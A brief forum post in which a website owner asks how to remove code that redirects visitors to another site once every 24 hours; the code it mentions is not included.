My website automatically redirect to another website

Hi everyone,

My website automatically redirects to another website when you browse it, I found that redirect website in the code as the following but I do not know how to delete it. It just happens the first time you check the website during 24 hour.

Please advise me what I should do to fix it. I really appreciate your help, thank you so much ??
